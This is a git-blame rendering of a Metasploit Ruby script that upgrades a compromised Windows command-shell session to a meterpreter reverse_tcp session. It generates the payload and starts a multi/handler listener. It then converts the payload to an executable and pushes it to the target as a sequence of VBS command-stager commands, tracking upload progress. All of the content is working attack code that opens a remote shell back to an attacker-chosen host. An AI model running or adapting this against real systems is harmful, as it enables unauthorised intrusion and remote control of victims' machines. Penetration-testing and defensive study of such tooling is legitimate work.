2010-03-12 21:51:55 +00:00
|
|
|
#
|
|
|
|
# Spawn a meterpreter session using an existing command shell session
|
|
|
|
#
|
2010-05-26 22:39:56 +00:00
|
|
|
# NOTE: Some of the following code is duplicated from the VBS CmdStager
|
2010-03-12 21:51:55 +00:00
|
|
|
#
|
|
|
|
# This is really only to prove the concept for now.
|
|
|
|
#
|
|
|
|
# -jduck
|
|
|
|
#
|
|
|
|
|
2010-03-12 22:59:19 +00:00
|
|
|
|
2010-06-23 03:09:55 +00:00
|
|
|
#
|
|
|
|
# Show the progress of the upload
|
|
|
|
#
|
|
|
|
def progress(total, sent)
|
2013-09-30 18:47:53 +00:00
|
|
|
done = (sent.to_f / total.to_f) * 100
|
|
|
|
print_status("Command Stager progress - %3.2f%% done (%d/%d bytes)" % [done.to_f, sent, total])
|
2010-06-23 03:09:55 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2010-03-12 22:59:19 +00:00
|
|
|
raise RuntimeError, "You must select a session." if (not session)
|
|
|
|
raise RuntimeError, "Selected session is not a command shell session!" if (session.type != "shell")
|
|
|
|
|
|
|
|
# Check for required datastore options
|
2010-03-22 20:17:18 +00:00
|
|
|
if (not session.exploit_datastore['LHOST'] or not session.exploit_datastore['LPORT'])
|
2013-09-30 18:47:53 +00:00
|
|
|
raise RuntimeError, "You must set LPORT and LHOST for this script to work."
|
2010-03-12 22:59:19 +00:00
|
|
|
end
|
2010-03-12 21:51:55 +00:00
|
|
|
|
2010-06-23 03:09:55 +00:00
|
|
|
|
2010-03-22 20:17:18 +00:00
|
|
|
lhost = session.exploit_datastore['LHOST']
|
|
|
|
lport = session.exploit_datastore['LPORT']
|
2010-06-23 03:09:55 +00:00
|
|
|
|
2010-03-12 22:59:19 +00:00
|
|
|
# maybe we want our sessions going to another instance?
|
|
|
|
use_handler = true
|
2010-03-22 20:17:18 +00:00
|
|
|
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)
|
2010-03-12 21:51:55 +00:00
|
|
|
|
|
|
|
# Process special var/val pairs...
|
2010-03-12 22:59:19 +00:00
|
|
|
# XXX: Not supported yet...
|
2010-03-12 21:51:55 +00:00
|
|
|
#Msf::Ui::Common.process_cli_arguments($framework, ARGV)
|
2010-06-23 03:09:55 +00:00
|
|
|
|
|
|
|
|
2010-03-12 21:51:55 +00:00
|
|
|
# Create the payload instance
|
|
|
|
payload_name = 'windows/meterpreter/reverse_tcp'
|
|
|
|
payload = framework.payloads.create(payload_name)
|
2010-07-13 09:01:36 +00:00
|
|
|
options = "LHOST=#{lhost} LPORT=#{lport}"
|
2010-03-12 21:51:55 +00:00
|
|
|
buf = payload.generate_simple('OptionStr' => options)
|
|
|
|
|
2010-03-12 22:59:19 +00:00
|
|
|
#
|
|
|
|
# Spawn the handler if needed
|
|
|
|
#
|
2010-06-23 03:09:55 +00:00
|
|
|
aborted = false
|
|
|
|
begin
|
2010-03-12 21:51:55 +00:00
|
|
|
|
2013-09-30 18:47:53 +00:00
|
|
|
mh = nil
|
|
|
|
if (use_handler)
|
|
|
|
mh = framework.modules.create("exploit/multi/handler")
|
|
|
|
mh.datastore['LPORT'] = lport
|
|
|
|
mh.datastore['LHOST'] = lhost
|
|
|
|
mh.datastore['PAYLOAD'] = payload_name
|
|
|
|
mh.datastore['ExitOnSession'] = false
|
|
|
|
mh.datastore['EXITFUNC'] = 'process'
|
|
|
|
mh.exploit_simple(
|
|
|
|
'LocalInput' => session.user_input,
|
|
|
|
'LocalOutput' => session.user_output,
|
|
|
|
'Payload' => payload_name,
|
|
|
|
'RunAsJob' => true)
|
|
|
|
# It takes a little time for the resources to get set up, so sleep for
|
|
|
|
# a bit to make sure the exploit is fully working. Without this,
|
|
|
|
# mod.get_resource doesn't exist when we need it.
|
|
|
|
select(nil, nil, nil, 0.5)
|
|
|
|
if framework.jobs[mh.job_id.to_s].nil?
|
|
|
|
raise RuntimeError, "Failed to start multi/handler - is it already running?"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Make the payload into an exe for the CmdStager
|
|
|
|
#
|
|
|
|
lplat = [Msf::Platform::Windows]
|
|
|
|
larch = [ARCH_X86]
|
|
|
|
linemax = 1700
|
|
|
|
if (session.exploit_datastore['LineMax'])
|
|
|
|
linemax = session.exploit_datastore['LineMax'].to_i
|
|
|
|
end
|
|
|
|
opts = {
|
|
|
|
:linemax => linemax,
|
2013-12-23 22:44:56 +00:00
|
|
|
:decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64"),
|
2013-09-30 18:47:53 +00:00
|
|
|
#:nodelete => true # keep temp files (for debugging)
|
|
|
|
}
|
|
|
|
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, buf)
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Generate the stager command array
|
|
|
|
#
|
|
|
|
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
|
|
|
|
cmds = cmdstager.generate(opts)
|
|
|
|
if (cmds.nil? or cmds.length < 1)
|
|
|
|
print_error("The command stager could not be generated")
|
|
|
|
raise ArgumentError
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Calculate the total size
|
|
|
|
#
|
|
|
|
total_bytes = 0
|
|
|
|
cmds.each { |cmd| total_bytes += cmd.length }
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Run the commands one at a time
|
|
|
|
#
|
|
|
|
sent = 0
|
|
|
|
cmds.each { |cmd|
|
|
|
|
ret = session.shell_command_token_win32(cmd)
|
|
|
|
if (not ret)
|
|
|
|
aborted = true
|
|
|
|
else
|
|
|
|
ret.strip!
|
|
|
|
if (not ret.empty?)
|
|
|
|
aborted = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
if aborted
|
|
|
|
print_error("Error: Unable to execute the following command:")
|
|
|
|
print_error(cmd.inspect)
|
|
|
|
print_error('Output: ' + ret.inspect) if ret and not ret.empty?
|
|
|
|
break
|
|
|
|
end
|
|
|
|
|
|
|
|
sent += cmd.length
|
|
|
|
|
|
|
|
progress(total_bytes, sent)
|
|
|
|
}
|
2010-03-12 21:51:55 +00:00
|
|
|
rescue ::Interrupt
|
2013-09-30 18:47:53 +00:00
|
|
|
# TODO: cleanup partial uploads!
|
|
|
|
aborted = true
|
2010-03-25 01:45:10 +00:00
|
|
|
rescue => e
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("Error: #{e}")
|
|
|
|
aborted = true
|
2010-03-12 21:51:55 +00:00
|
|
|
end
|
2010-03-25 01:45:10 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Stop the job
|
|
|
|
#
|
2010-03-29 17:37:58 +00:00
|
|
|
if (use_handler)
|
2013-09-30 18:47:53 +00:00
|
|
|
Thread.new do
|
|
|
|
if not aborted
|
|
|
|
# Wait up to 10 seconds for the session to come in..
|
|
|
|
select(nil, nil, nil, 10)
|
|
|
|
end
|
|
|
|
framework.jobs.stop_job(mh.job_id)
|
|
|
|
end
|
2010-03-29 17:37:58 +00:00
|
|
|
end
|